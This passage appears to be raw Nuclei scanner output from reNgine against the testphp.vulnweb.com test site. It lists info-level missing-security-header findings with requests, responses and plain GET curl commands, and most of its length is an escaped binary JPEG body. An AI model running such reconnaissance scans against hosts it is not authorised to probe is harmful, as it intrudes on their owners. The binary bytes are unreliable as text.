8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.737994973Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:45.738009501Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu 